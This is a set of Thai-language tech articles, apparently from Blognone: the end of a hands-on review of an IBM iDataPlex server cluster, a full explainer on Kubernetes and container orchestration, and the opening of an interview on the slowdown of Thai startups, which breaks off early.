ลดปัญหาที่เวลาซ่อมบำรุงระบบ จะต้องเดินสลับไปมาด้านหน้าและหลังเครื่อง ด้านหลัง เป็นสายไฟล้วนๆ และมีปลั๊กไฟแบบ Power Plug ยื่นออกมาจากตู้ทั้งหมด 4 เส้น พร้อมเสียบไฟ ตรงนี้อาจจะสงสัยว่าทำไมไม่มีรูปตอนประกอบเครื่องเข้าตู้ คือiDataPlex จะเป็นระบบแบบ Build-to-order ครับ เราบอกจำนวนเครื่อง รูปแบบของระบบเครือข่าย การเชื่อมต่อกับระบบภายนอก แล้วโรงงานจะ Build ระบบ รวมถึงการเดินสายทั้งหมดมาเสร็จสรรพตั้งแต่โรงงาน ขนมาทั้งตู้แบบนี้เลย แล้วก็จะมีคู่มือพร้อมกระดาษใบนึงแปะมา บอกว่าให้เอาสายแลนจากข้างนอกมาเสียบสวิตช์ตัวไหน ที่จุดไหนบ้าง นึกภาพเหมือนซื้อพลาสติกโมเดลแบบประกอบเสร็จแล้ว เหลือแต่ลงสีอะไรประมาณนั้นครับ ตรงนี้ต้องระวังเหมือนกัน คือถ้าซื้อระบบนี้ ต้องตรวจดูให้ดีว่าจากที่จอดรถส่งของ มายังสถานที่ติดตั้ง ประตู ลิฟต์ ทางเดิน สามารถเข็น iDataplex เข้ามาได้หรือเปล่า หากไม่ได้คงต้องแจ้งทาง IBM ไว้ก่อน เซิร์ฟเวอร์ Rack อีก 4 เครื่องที่เป็นเครื่องควบคุม จะเป็นรุ่น x3650 M3 นอกจากนี้จะมี SAN Storage ขนาดรวมประมาณ 20TB แยกไว้ต่างหากสำหรับเก็บข้อมูลด้วย ตรงนี้จริงๆแล้วจะรวมตู้กันมากับ iDataPlex ก็ได้ แต่แยกส่วนไว้เพื่อความเป็นสัดส่วนครับ สายแลน 4 เส้นและสาย Infiniband อีก 4 เส้นจากเครื่องควบคุมจะเอามาเสียบไว้ในสวิตช์ภายใน (สายสีส้ม 4 เส้นคือ Infiniband จากเครื่องควบคุม) ตรงนี้จะมีกระดาษคู่มือบอกไว้อย่างที่บอกไว้แล้วข้างต้น แต่ลองดูแล้วจะเสียบรูอื่นก็ไม่เป็นไร ตัวสวิตช์เครือข่าย Gigabit จะใช้วิธีเชื่อมกันแบบเป็น Tree คือมีสวิตช์หลัก 1 และตัวรองอีก 3 ตัว ตรงนี้ถ้าเอามาประมวลผลด้วยคงมีประเด็นเรื่องประสิทธิภาพ แต่เนื่องจากเอามาใช้จัดการเฉยๆจึงไม่มีประเด็นอะไร ในส่วนของ Infiniband ก็เชื่อมต่อในลักษณะเดียวกัน แต่จากการทดสอบประสิทธิภาพพบว่าได้ดีทีเดียว มีรายละเอียดท้ายๆบทความครับ จากรูป จะดูเหมือนว่าตู้ iDataPlex จะดูใหญ่เท่ากับ 2 ตู้ Rack ใช่ไหมครับ จริงๆแล้ว iDataPlex จะใช้วิธี "หันข้าง" คือใส่ Server ทางด้านข้างๆตู้ครับ จากรูปด้านล่างจะเห็นว่าตู้ iDataPlex จะวางหันข้าง เนื่องจากตัว DX360M3 เองนั้นได้ออกแบบมาให้สั้นกว่า Server Rack ทั่วไปเพื่อให้สามารถระบายความร้อนได้เร็วกว่าปกติ ซึ่งจะเหมาะสมกว่าสำหรับระบบที่มีคอมพิวเตอร์จำนวนมากๆแบบนี้ นี่เป็นวิธีที่ทำให้ iDataPlex สามารถใส่เซิร์ฟเวอร์ได้กว่า 80 เครื่องในพื้นที่ตู้ Rack เดียวนั่นเอง **IBM dx360 M3** ตัวเครื่อง dx360 M3 เองถ้าดูจากด้านหน้าจะเหมือนเซิร์ฟเวอร์ 1U ปกติ แต่จะสั้นกว่าปกติครึ่งหนึ่ง ด้านหลังเครื่องจะคล้ายๆเบลดเซิร์ฟเวอร์ คือมีพอร์ตพิเศษที่เชื่อมเครื่องเข้ากับตัวระบบไฟของตู้ โดยช่องๆหนึ่งของ iDataPlex จะสูง 2U ในกรณีของระบบนี้จะใส่เครื่องเซิร์ฟเวอร์ไปเลย 2 เครื่องๆละ 1U แต่ถ้าต้องการก็จะมีเซิร์ฟเวอร์รุ่นอื่นๆที่มีขนาด 2U ซึ่งจะใส่ฮาร์ดดิสก์ได้เยอะขึ้น หรือรองรับการ์ด GPU ของ Nvidia ในตระกูล Tesla ได้ อันนี้รูปจากคลัสเตอร์ MAEKA ของมหาวิทยาลัยเกษตรศาสตร์ซึ่งมี NVIDIA Tesla ด้วยครับ ตัวนี้จริงๆติดตั้งไปก่อน PHOENIX แต่เนื่องจากใช้ตู้ Rack ธรรมดาจึงไม่นับเป็น iDataPlex เต็มรูปแบบ ส่วนของการ์ด Tesla จะกินพื้นที่ไปเลย 1U ตามรูป อันนี้แสดงให้เห็นว่าเราเอาเฉพาะเครื่อง dx360 M3 มาติดตั้งในตู้ Rack ธรรมดาได้เหมือนกัน ภายในเครื่องก็จะมี Gigabit Ethernet 2 พอร์ต CPU Memory เป็นแบบปกติ จะเห็นว่า (น่าจะ) หาหน่วยความจำเพิ่มเติมมาใส่เองได้อยู่ ตามสเปคบอกว่าใช้ DDR3 Lowe Profile DIMM with ECC และด้านในก็จะมี Slot PCIe มาให้ ซึ่งในระบบนี้จะใช้สำหรับการ์ดเครือข่าย Infiniband ด้านหน้าเครื่องมีช่องใส่ฮาร์ดดิสก์ พอร์ต USB และพอร์ตจอก็อยู่ด้านหน้าหมด และนอกจาก Gigabit Ethernet 2 พอร์ต แล้วยังมีแยกพอร์ต System Management มาให้ด้วย แต่สามารถปรับแต่งในไบออสได้ให้ใช้งาน Gigabit Ethernet พอร์ตแรกแทนไป จะได้ไม่ต้องเดินสายเพิ่มเอง นอกจากประกอบและเดินสายแล้ว ยังมีการแปะ Label มาให้ด้วย อย่างในรูปนี้คือเครื่องที่ 70 ครับ ในเรื่องของความร้อน อันนี้ผมไม่สามารถทดสอบได้ตรงๆ เพราะไม่รู้จะทดสอบยังไงครับ แต่ห้องที่ติดตั้งก็ไม่ใช่ Data Center เต็มรูปแบบ และแอร์ส่วนใหญ่เป็นแอร์บ้าน ก็เรียกว่าพอได้อยู่ (เครื่องชุดนี้ไม่มี Rear Door Heat eXchanger นะครับ) ส่วนการกินไฟก็ไม่รู้จะทดสอบยังไงเช่นกันครับ **ประสิทธิภาพ** เนื่องจากระบบใช้หน่วยประมวลผล Intel Xeon อยู่แล้วประสิทธิภาพของเซิร์ฟเวอร์แต่ละเครื่องจึงไม่น่ามีประเด็นอะไรมากนัก ในส่วนของประสิทธิภาพรวมของระบบเมื่อวัดจริง (Rmax) ด้วย HPC Benchmark มาตรฐาน High Performance Linpack ของ PHOENIX วัดได้อยู่ที่ 5.175 เทราฟลอป (Floating Point Operation Per Second: FLOPS) คิดเป็น 88% ของประสิทธิภาพที่ได้จากการคำนวณ (Rpeak) ซึ่งตามประสบการณ์ของผมถือว่าสูงมาก และ(น่าจะ)ติดอันดับแรกๆของประเทศไทยเลยทีเดียว ก็นับได้ว่า iDataPlex สามารถให้ประสิทธิภาพโดยภาพรวมได้สูงในระดับน่าพอใจครับ ปิดท้ายด้วยรูปเครื่องเต็มๆ กับภาพจาก Ganglia Monitoring ให้เห็นว่าทำงานกันหนักจริงๆ รูปนี้แสดง 656 CPU เพราะมี 2 เครื่องไม่ได้ปิด Hyperthread ครับ เลยมี CPU เพิ่มขึ้นไปอีก 16 CPU จากที่ควรจะมี 640 ## สรุป จุดเด่นของ iDataPlex มีดังนี้ - ใส่เซิร์ฟเวอร์ได้เยอะมาก สูงสุดถึง 84 เครื่อง 1U พร้อมอุปกรณ์เครือข่ายได้อีก 5-10U เท่าที่เห็นด้วยตา (ตามสเปคบอก 16U) ในพื้นที่ 1 ตู้ Rack แบบหันข้าง - เดินสายไว้หมดเสร็จสรรพ มาปุ๊ป เสียบปลั๊ก เดินสายแลนภายนอก จบ - รองรับเซิร์ฟเวอร์หลายๆแบบ มีทั้งแบบมี GPU หรือเป็นพวกใส่ฮาร์ดดิสก์ได้เยอะๆก็มี - เลือกได้ทั้งแบบมีฮาร์ดแวร์ Redundancy หรือไม่มี ช่วยประหยัดงบได้อีก ข้อจำกัด - ตอนขนเครื่องเข้า ต้องดูลู่ทางเข้าเตรียมไว้ก่อน ไม่งั้นมีเฮครับ เครื่องใหญ่ไปเข้าประตูไม่ได้ (size ของตู้เท่ากับตู้ Rack 42U ปกติ) ชักจะยาวแล้ว ขอจบในส่วน iDataPlex เพียงเท่านี้ครับ ในส่วนของซอฟต์แวร์และการติดตั้งระบบ หากมีโอกาสอาจจะมาเขียนถึงครับ **อ้างอิง**: [IBM System x iDataPlex dx360 M3 Product Guide](http://www-03.ibm.com/systems/x/hardware/idataplex/dx360m3/index.html)
# Kubernetes คืออะไร ทำไม Orchestration จึงเป็นหัวใจของ Infrastructure ยุคนี้ ในรอบ 1-2 ปีนี้ ชื่อเทคโนโลยีฝั่งเซิร์ฟเวอร์ที่พบเห็นได้บ่อยมากคือคำว่า **Kubernetes** ที่แค่เห็นก็อ่านไม่ออกแล้วว่าออกเสียงอย่างไร (อ่านว่า "คูเบอร์เนเตส") แต่ความร้อนแรงของมันถึงขั้นพลิกโฉมสถาปัตยกรรมของระบบโครงสร้างพื้นฐานทางไอที (infrastructure) ไปอย่างสิ้นเชิง Kubernetes เป็นซอฟต์แวร์สำหรับ **Container Orchestration** (คำเดียวกับ "วงออเคสตร้า") ถ้าให้อธิบายแบบสั้นๆ มันคือซอฟต์แวร์ที่ใช้จัดการและควบคุม "วงดนตรีคอนเทนเนอร์" นั่นเอง ส่วนคำอธิบายแบบยาวๆ สามารถอ่านได้จากบทความนี้ครับ ### Orchestration = Container + Cluster ในบทความตอนที่แล้ว เราอธิบายถึง "คอนเทนเนอร์" ว่ามันคืออะไร ([รู้จัก Container มันคืออะไร แตกต่างจาก Virtualization อย่างไร?](https://www.blognone.com/node/105928)) เทคโนโลยีคอนเทนเนอร์ถูกสร้างขึ้นมาเพื่อให้เราจัดการแพ็กเกจซอฟต์แวร์ที่จำเป็น และขนย้ายมันไปใช้ตามที่ต่างๆ ได้ง่ายขึ้น เหมือนกับจับของใส่ตู้คอนเทนเนอร์แล้วขนขึ้นเรือหรือรถบรรทุกก็ได้ แต่การจะนำคอนเทนเนอร์ไปใช้งานอย่างไร ถือเป็นอิสระเต็มที่ของผู้ใช้งาน ซึ่งเราสามารถรันคอนเทนเนอร์ในเครื่องโลคอล (นักพัฒนาทดสอบโค้ดตัวเองบนเครื่องตัวเอง) หรือรันบนเซิร์ฟเวอร์แบบดั้งเดิม (bare metal) ก็ได้ทั้งนั้น ในโลกยุคคลาวด์ เราสามารถเช่าเซิร์ฟเวอร์ใหม่ขึ้นมาได้ทันทีตามความต้องการของผู้ใช้ การเช่าเครื่องเสมือนจำนวนมากๆ แล้วมาต่อเชื่อมกันเป็นคลัสเตอร์เพื่อขยายตัว รองรับโหลดจำนวนมหาศาล เป็นเรื่องปกติที่ทำกันทั่วไป เมื่อเรานำเทคโนโลยี "คอนเทนเนอร์" ในฝั่งแอพพลิเคชัน มาจับคู่กับ "คลัสเตอร์" ในฝั่งของโครงสร้างพื้นฐานที่รันงานเหล่านั้น หน้าที่บริหารจัดการตรงนี้คือคำว่า Orchestration นั่นเอง (บางครั้งก็ใช้คำว่า container management) ### ศึกชิงความเป็นเจ้า Orchestration ในอดีต การนำแอพพลิเคชันที่พัฒนาเสร็จแล้วไปรันบนเครื่องจริง (deployment) เป็นกระบวนการที่ซับซ้อน และต้องพึ่งพางานแบบ manual ซะเยอะ ผู้ดูแลระบบมักต้องเขียนสคริปต์กันเอง ซึ่งมีข้อผิดพลาดได้ง่าย ยิ่งการรันบนคลัสเตอร์ที่มีเครื่องจำนวนมาก ต้องย้ายงานไปมา ต้องขยายตัวหรือหดตัวตามความต้องการของลูกค้า ยิ่งก่อให้เกิดความซับซ้อนมากขึ้นเป็นทวีคูณ หลายปีที่ผ่านมาจึงมีความพยายามแก้ปัญหานี้จากหลายฝ่าย รายที่โดดเด่นมีด้วยกัน 3 ค่ายคือ - **Docker Swarm** จาก Docker Inc. - **Kubernetes** จากกูเกิล - **Apache Mesos/Marathon** ที่ริเริ่มโดยทีมงานจาก University of California, Berkeley และภายหลังก่อตั้งบริษัท Mesosphere, Inc. มาสนับสนุน แนวคิดทางเทคนิคของซอฟต์แวร์ orchestration แต่ละรายมีความแตกต่างกันอยู่บ้าง กรณีของ Apache Mesos สร้างขึ้นก่อนเป็นรายแรก (เริ่มในปี 2009) และออกแบบมาจัดการคลัสเตอร์อะไรก็ได้ ไม่จำเป็นต้องเป็นคอนเทนเนอร์อย่างเดียว ภายหลังจึงมีซอฟต์แวร์ Marathon มาเสริมเรื่องการจัดการคอนเทนเนอร์ ในขณะที่บริษัท Mesosphere นำ Mesos ไปปรับแต่งเป็นซอฟต์แวร์เชิงพาณิชย์ และเรียกชื่อว่า DC/OS (ย่อมาจาก Datacenter OS) แสดงให้เห็นถึงการเน้นเรื่องการจัดการศูนย์ข้อมูลเป็นหลัก ส่วน Docker Swarm เริ่มออกเวอร์ชันแรกๆ ในปี 2015 โดยเป็นส่วนต่อขยายตามธรรมชาติของ Docker Container ของบริษัท Docker Inc. ที่เอาชนะสงครามคอนเทนเนอร์ได้อย่างเบ็ดเสร็จ (อีกฝ่ายคือ [Rocket หรือ rkt ของ CoreOS](https://www.blognone.com/node/63486)) แน่นอนว่ามาถึงตอนนี้ เรารู้แล้วว่าผู้ชนะสงคราม orchestration คือ Kubernetes ของกูเกิล ดังนั้นมาย้อนประวัติของมันแบบละเอียดกันสักหน่อย ### ประวัติความเป็นมาของ Kubernetes: จาก Borg สู่โลกภายนอก ชื่อ Kubernetes มาจากภาษากรีก κυβερνήτης ซึ่งแปลเป็นภาษาอังกฤษได้ว่า helmsman หรือ "กัปตันเรือ" จึงเป็นที่มาของโลโก้รูปพวงมาลัยเรือ (คำว่า Kubernetes มีรากศัพท์มาจากคำเดียวกับคำว่า Governor ด้วย) แต่เนื่องจากชื่อโครงการค่อนข้างยาว เรียกยาก ในวงการเลยมักเรียกกันย่อๆ ว่า K8s หรือบ้างก็เรียก Kube Kubernetes [เปิดตัวต่อสาธารณะครั้งแรกในเดือนมิถุนายน 2014](https://cloudplatform.googleblog.com/2014/06/an-update-on-container-support-on-google-cloud-platform.html) ([เป็นข่าวใน Blognone ครั้งแรกเดือนกรกฎาคม 2014](https://www.blognone.com/node/58273)) แต่ประวัติของมันยาวนานกว่านั้น กูเกิลมีธรรมเนียมการสร้างซอฟต์แวร์เพื่อใช้เองภายในอยู่แล้ว และมีระบบจัดการคอนเทนเนอร์ของตัวเองเรียกว่า **Borg** (มาจากเผ่าเอเลี่ยนกึ่งหุ่นยนต์ในซีรีส์ Star Trek) ซึ่งทำงานอยู่บน [cgroups](https://en.wikipedia.org/wiki/Cgroups) ฟีเจอร์ของเคอร์เนลลินุกซ์ และเป็นต้นแบบของคอนเทนเนอร์ในยุคปัจจุบัน Borg วิวัฒนาการมาเรื่อยๆ โดยไม่ได้คำนึงถึงการออกแบบสถาปัตยกรรมมาตั้งแต่ต้น เพราะเน้นสร้างฟีเจอร์ใหม่ตามความต้องการของทีมงานภายในแต่ละทีม สุดท้าย Borg จึงไปต่อไม่ไหว กูเกิลจึงสร้างซอฟต์แวร์ตัวใหม่ขึ้นมาแทนโดยใช้ชื่อว่า **Omega** Omega นำแนวคิดหลายอย่างจาก Borg มาใช้งาน แล้วเพิ่มระบบการเก็บสถานะของคลัสเตอร์ไว้ที่ส่วนกลางเพื่อป้องกันข้อมูลขัดแย้งกันเอง เมื่อเทคโนโลยีคอนเทนเนอร์เริ่มได้รับความนิยม และกูเกิลเองก็มีบริการลักษณะนี้ต่อลูกค้าภายนอกบริษัท (Google Cloud Platform) วิศวกรกลุ่มหนึ่งของกูเกิลจึงตัดสินใจสร้างโครงการแบบนี้ขึ้นมาใหม่อีกครั้ง ซึ่งก็คือ Kubernetes เนื่องจาก Kubernetes สืบทอดแนวคิดหลายอย่างมาจาก Borg ในช่วงแรก โครงการจึงมีโค้ดเนมว่า **Project Seven** ซึ่งมาจากตัวละคร Seven of Nine บอร์กสาวจากเรื่อง Star Trek เช่นกัน (และเป็นเหตุผลว่าทำไมไอคอนพวงมาลัยเรือถึงมี 7 แกน) Kubernetes ได้รับความนิยมอย่างรวดเร็ว และได้รับการสนับสนุนจากบริษัทยักษ์ใหญ่อย่าง Microsoft, Red Hat, IBM จนเมื่อ[กูเกิลออก Kubernetes 1.0 ในเดือนกรกฎาคม 2015](https://www.blognone.com/node/70570) ก็ตัดสินใจตั้งมูลนิธิ **Cloud Native Computing Foundation (CNCF)** มาดูแลโครงการต่อแทน หมายเหตุ: ประวัติอย่างละเอียดของ Borg, Omega, Kubernetes สามารถอ่านได้จากบทความ [Borg, Omega, and Kubernetes](https://queue.acm.org/detail.cfm?id=2898444) ที่เขียนโดยทีมงานของกูเกิลผู้ร่วมก่อตั้ง Kubernetes ### แนวคิดของ Kubernetes เนื่องจากบทความนี้ไม่ใช่บทความสอนการใช้งานเชิงเทคนิค จึงอธิบายแนวคิดของ Kubernetes เพียงคร่าวๆ เพื่อให้เห็นภาพเท่านั้น รายละเอียดอื่นๆ สามารถอ่านได้จาก[เว็บไซต์ Kubernetes](https://kubernetes.io/) สถาปัตยกรรมคลัสเตอร์ของ Kubernetes ไม่ต่างอะไรจากคลัสเตอร์ทั่วๆ ไป นั่นคือมีเครื่องที่เป็น Master และ Slave (ในโลกของ Kubernetes ใช้คำว่า **Node**) โดยในแต่ละโหนดติดตั้งซอฟต์แวร์ Kubelet เพื่อบริหารจัดการ จากนั้นเมื่อเรานำแอพในคอนเทนเนอร์ไปรันบนคลัสเตอร์ (deploy) ระบบของ Kubernetes จะสื่อสารกันระหว่าง Master/Node เพื่อนำงานไปรันบนเครื่องให้เราเอง แนวคิดสำคัญของ Kubernetes คือคำว่า **Pod** เปรียบเสมือนเป็นก้อนรวมของสิ่งที่จำเป็นทั้งหมดในการรันแอพพลิเคชัน ประกอบด้วยตัวแอพเอง (ที่อยู่ในคอนเทนเนอร์) และสตอเรจ (Volume) โดย Pod แต่ละก้อนมีหมายเลขไอพีของตัวเอง ในเครื่องแต่ละ Node จึงสามารถมีงานไปรันได้หลาย Pod นอกจาก Pod แล้ว โลกของ Kubernetes ยังมีแนวคิดเรื่อง **Services** หรือการจัดกลุ่ม Node/Pod จำนวนมากๆ เข้าด้วยกัน แอพพลิเคชันหนึ่งตัวสามารถแบ่งได้เป็นหลาย Pod และรันอยู่บนหลาย Node ดังนั้น การสเกลให้รองรับโหลดที่เพิ่มขึ้นจึงทำได้ง่าย เพราะมีแนวคิดเชิง abstraction คือ Node/Pod/Service มาคอยช่วยนั่นเอง นอกจากนี้ Kubernetes ยังมีฟีเจอร์อื่นๆ อีกมาก เช่น การอัพเดตข้อมูลในคอนเทนเนอร์ (เปลี่ยนเวอร์ชันของไลบรารีหรือโค้ด), การ rollback กลับไปเวอร์ชันเดิมเมื่อเกิดปัญหา และการทำ Continuous Integration and Continuous Delivery (CI/CD) ซึ่งจะไม่กล่าวถึงในบทความนี้ ### ชัยชนะของ Kubernetes ชัยชนะของ Kubernetes มาจากปัจจัยหลายประการ ในแง่เทคนิค มันสืบทอดสถาปัตยกรรมภายในของกูเกิลที่ผ่านการทดสอบงานจริง รองรับโหลดหนักๆ ระดับกูเกิลมาได้แล้ว (Pokemon Go ก็รันอยู่บน Kubernetes) บวกกับมีจุดสมดุลที่พอดีระหว่างฟีเจอร์และความซับซ้อนในการดูแล เมื่อเปรียบเทียบกับคู่แข่งอย่าง Docker Swarm ที่อาจใช้ง่ายกว่า แต่ความสามารถด้อยกว่า ส่วน Apache Mesos ก็มีความซับซ้อนสูงมาก ปัจจัยเรื่องพันธมิตรร่วมรบก็มีความสำคัญไม่แพ้กัน Kubernetes เป็นโครงการของกูเกิล ย่อมได้รับการสนับสนุนจากกูเกิลอย่างเต็มที่มาตั้งแต่แรก แถมยังได้พันธมิตรระดับบิ๊กอย่าง IBM หรือ Red Hat เข้าร่วมด้วยตั้งแต่ยุคแรกๆ พันธมิตรของ Kubernetes ที่น่าสนใจคือไมโครซอฟท์ ช่วงแรกที่กระแส container orchestration เริ่มมาแรง แต่ยังไม่ปรากฏผู้ชนะที่ชัดเจน ไมโครซอฟท์ก็ใช้วิธีสนับสนุนทุกฝ่ายแล้วรอดูว่าใครจะชนะ โดย[การเข้าลงทุนในบริษัท Mesosphere เมื่อปี 2016](https://www.blognone.com/node/79425) และ[เปิดตัวบริการ Azure Container Service (ACS) ที่รองรับทั้ง Mesos และ Docker Swarm](https://www.blognone.com/node/80142) แต่พอมาถึงปี 2017 เมื่อชัยชนะของ Kubernetes เริ่มปรากฏชัด ไมโครซอฟท์ก็เปลี่ยนใจกันง่ายๆ เปลี่ยนชื่อ **Azure Container Service (ACS)** เป็น **Azure Kubernetes Service (AKS)** และหันมาเลือกข้าง Kubernetes เต็มตัว (ปัจจุบันถ้าเข้าหน้าเว็บ ACS จะถูก redirect มายัง AKS แทน และ ACS ยังมีให้ใช้งานอยู่บน Azure Marketplace แต่ก็ไม่เน้นแล้ว) ไมโครซอฟท์ยังจ้าง [Brendan Burns](https://www.linkedin.com/in/brendan-burns-487aa590/) หนึ่งในผู้ร่วมก่อตั้ง Kubernetes มาทำงานด้วย เรียกได้ว่าดึงตัวมาจากกูเกิลกันตรงๆ เพื่อมารับผิดชอบงานด้าน Kubernetes โดยเฉพาะ แสดงให้เห็นถึงความสำคัญของ Kubernetes ในสายตาไมโครซอฟท์ได้เป็นอย่างดี อีกตัวอย่างที่น่าสนใจไม่แพ้กันคือ AWS ที่ช่วงแรกๆ อินดี้ไม่สนใจใคร สร้างระบบ orchestration ของตัวเองขึ้นมาโดยไม่ยุ่งกับใคร โดยใช้ชื่อว่า **Amazon Elastic Container Service (ECS)** และผูกกับเทคโนโลยีของ AWS อย่างแนบแน่น แต่เมื่อ Kubernetes เริ่มดังขึ้นมา AWS ก็ออกบริการใหม่อีกตัวคือ **Amazon Elastic Container Service for Kubernetes (EKS)** ขึ้นมาให้เลือกใช้งานได้ตามชอบ (อย่างไรก็ตาม ECS ใช้ฟรี แต่ EKS คิดเงิน) ทั้งไมโครซอฟท์และ AWS ต่างก็สมัครเข้าร่วมเป็นสมาชิก Cloud Native Computing Foundation (CNCF) ในช่วงกลางปี 2017 เป็นสัญญาณว่าผู้ให้บริการคลาวด์รายใหญ่ต่างยอมสยบให้กับ Kubernetes แล้ว แต่จุดสิ้นสุดสงครามคือเดือนตุลาคม 2017 ที่ Docker ประกาศความพ่ายแพ้ ทานกระแสไม่ไหว ต้องยอมซัพพอร์ต Kubernetes นอกเหนือจาก Docker Swarm ของตัวเอง (หลังจากดึงดัน พยายามต่อสู้มานาน) ถึงแม้ในแถลงการณ์ของ Docker จะบอกว่า "ผู้ใช้มีสิทธิเลือก" ว่าจะใช้ตัวไหน แต่ก็สะท้อนว่าถ้าสู้เขาไม่ได้ เข้าร่วมดีกว่านั่นเอง ฝั่งของ Apache Mesos ก็ไม่ใช่คู่แข่งตรงๆ ของ Kubernetes และสามารถทำงานด้วยกันได้ โดยบริษัท Mesosphere เองก็มีผลิตภัณฑ์ Mesosphere Kubernetes Engine (MKE) ออกมาจับตลาดเช่นกัน มาถึงตอนนี้โลก container orchestration ได้คำตอบชัดเจนแล้วว่า **ถ้าต้องการ container ให้ใช้ Docker และถ้าต้องการ orchestration ให้ใช้ Kubernetes** ### Kubernetes Distributions ในการใช้งานจริง Kubernetes ประกอบด้วยโครงการย่อยๆ มากมาย การใช้ซอฟต์แวร์จากโครงการโอเพนซอร์สต้นน้ำ (เช่น ระบบมอนิเตอร์ Prometheus) จึงต้องใช้ความรู้ความเชี่ยวชาญสูง ตรงนี้จึงเกิด Kubernetes Distribution หรือเทียบได้กับ "ดิสโทร" ของลินุกซ์ ที่เป็นการรวบรวมซอฟต์แวร์ที่จำเป็น และเครื่องมืออำนวยความสะดวกอื่นๆ มาให้พร้อมสรรพ ติดตั้งแล้วใช้งานได้ทันที ตัวอย่าง Kubernetes Distribution แบบง่ายๆ ได้แก่ [Minikube](https://kubernetes.io/docs/setup/minikube/) ที่เน้นการใช้งานบนเครื่องตัวเอง (คลัสเตอร์มีเครื่องเราเครื่องเดียว) เหมาะสำหรับการทดสอบและลองใช้งาน ปัจจุบัน บริษัทไอทียักษ์ใหญ่ที่มีธุรกิจด้านศูนย์ข้อมูล-คลาวด์ ต่างก็มี Kubernetes Distribution เวอร์ชันของตัวเองไว้บริการลูกค้า โดยใช้ชื่อเชิงพาณิชย์แตกต่างกันไป (บางครั้งถ้าไม่บอกก็ไม่รู้ว่ามันคือ Kubernetes) เช่น - IBM Cloud Private - Red Hat OpenShift ([บทความใน Blognone](https://www.blognone.com/node/106208)) - Pivotal Container Service (PKS) - Oracle Linux Container Services - Cisco Container Platform - Canonical Distribution of Kubernetes (CDK) - Rancher โซลูชันเหล่านี้สามารถรันได้ทั้งบนคลาวด์แบบสาธารณะ (public cloud) หรือเครื่องขององค์กรเอง (private cloud/on premise) ส่วนผู้ให้บริการคลาวด์แบบสาธารณะ (public cloud) รายใหญ่ ต่างก็มีบริการ Kubernetes ให้บริการเช่นกัน - Google Kubernetes Engine (GKE) - Amazon Elastic Container for Kubernetes (EKS) - Azure Kubernetes Serve (AKS) รายชื่อทั้งหมดดูได้จาก [Kubernetes Partners](https://kubernetes.io/partners) ### เมื่อไรที่ควรใช้ Kubernetes แน่นอนว่า Kubernetes (หรือ container orchestration) ไม่ใช่โซลูชันที่เหมาะสำหรับทุกคน แถมการใช้งานยังต้องแลกมาด้วยความซับซ้อนของระบบที่เพิ่มจากเดิมมาก รูปแบบงานที่เหมาะสมกับการทำ container orchestration จึงควรมีปัจจัยเหล่านี้ - แอพพลิเคชันที่ใช้งาน ต้องถูกปรับให้อยู่ในสภาพแวดล้อมแบบ container มาก่อนแล้ว ถึงค่อยมาทำ orchestration ในภายหลัง หากเป็นแอพพลิเคชันยุคเก่า (legacy) ที่ไม่ได้ปรับให้เป็น container มาก่อน ก็ต้องไปทำให้เสร็จก่อน - งานมีความต้องการ scalable ขยายขีดความสามารถให้รองรับจำนวนเวิร์คโหลดที่แปรเปลี่ยนไป หากไม่จำเป็นขนาดนั้น ก็ใช้วิธีรันงานใน container เพียงอย่างเดียว (docker-compose) ไปก่อน แล้วค่อยขยับไปใช้ Kubernetes ในภายหลังได้ ซึ่งตรงนี้มีเครื่องมืออย่าง [Kompose](https://github.com/kubernetes/kompose) ช่วยแปลงอยู่แล้ว - ตัวบริการมีขนาดใหญ่เกินกำลังของเครื่องเดียว (หรือ VM ตัวเดียว) จึงถูกบังคับให้ต้องต่อเครื่องเป็นคลัสเตอร์เพื่อรองรับผู้ใช้งาน กรณีแบบนี้จึงเหมาะกับการทำ orchrestration สรุปง่ายๆ ว่าถ้างานของเรา "ไม่ใหญ่พอ" ที่จะต้องใช้ Kubernetes ก็ไม่จำเป็นต้องใช้ Kubernetes นั่นเอง ### สู่อนาคต Cloud Native ซอฟต์แวร์อย่าง Kubernetes เกิดขึ้นมาสำหรับยุคของคลาวด์ จึงเกิดคำเรียกซอฟต์แวร์กลุ่มนี้ว่า Cloud Native กูเกิลเองก็ใช้คำนี้ไปตั้งชื่อมูลนิธิ Cloud Native Computing Foundation (CNCF) ซึ่งนอกจาก Kubernetes แล้ว ยังมีซอฟต์แวร์ตัวอื่นๆ ที่เกี่ยวข้องกันอีกหลายตัว เช่น - Prometheus (monitoring) - OpenTracing (tracing) - Fluentd (logging) - Containerd (container runtime) จาก Docker - Rkt (container runtime) จาก CoreOS - Envoy (service proxy) - CoreDNS (service discovery) - Linkerd (service mesh) นอกจากนี้ยังมีซอฟต์แวร์ตัวอื่นๆ ที่อยู่นอก CNCF แต่พัฒนาโดยกูเกิลและพันธมิตร เช่น Istio ที่ร่วมกับ IBM และ Red Hat โดยเรียกใช้ซอฟต์แวร์บางตัวจาก CNCF เช่น Envoy อีกทีหนึ่ง ซอฟต์แวร์เหล่านี้นำมาใช้ร่วมกันเพื่อให้การสร้าง container orchestration สมบูรณ์แบบมากขึ้น เพิ่มส่วนการบริหารจัดการ, monitoring, logging เข้ามา และการวางโครงสร้างพื้นฐานด้านการประมวลผลยุคคลาวด์ในอนาคต ซึ่งถ้ามีโอกาส เราจะหยิบมันมาเล่าถึงต่อไป
# ทำไมวงการสตาร์ตอัพไทยจึงซบเซาลงไป? ช่วงหลังมานี้เจอใครก็มักพูดว่า กระแสสตาร์ตอัพที่เคยบูมในบ้านเราช่วง 4-5 ปีก่อนอาจเริ่มดูซาๆ ลงไปบ้างแล้ว Blognone มีโอกาสสัมภาษณ์**คุณธนพงษ์ ณ ระนอง นายกสมาคม Thai Venture Capital Association (TVCA)** ในฐานะผู้มีประสบการณ์ลงทุนกับสตาร์ตอัพในบ้านเรามาอย่างโชกโชน (เคยดูแลโครงการ InVent ของ Intouch และปัจจุบันดูแลบริษัท Beacon VC ในสังกัดธนาคารกสิกรไทย) เพื่อขอมุมมองวิเคราะห์ว่าเพราะเหตุใด สตาร์ตอัพบ้านเราถึงดูซบเซาลงไป ### ธุรกิจแบบเดิมปรับตัวแล้ว แต่สตาร์ตอัพต่างหากที่ไม่ยอมปรับตัว คุณธนพงษ์เล่าว่า สมัยที่เริ่มทำโครงการ Venture Capital (VC) ให้กับบริษัทอินทัช ตอนนั้นถือเป็นศักราชใหม่ของสตาร์ตอัพ ตลาดยังเป็น blue ocean คือมีผู้เล่นในตลาดไม่มากนัก ในขณะที่คู่แข่งของสตาร์ตอัพไทยคือบรรดาธุรกิจแบบดั้งเดิม (corporate) ยังมีวิธีการทำงานแบบเดิมๆ ที่กระบวนการเยอะ เคลื่อนตัวช้า 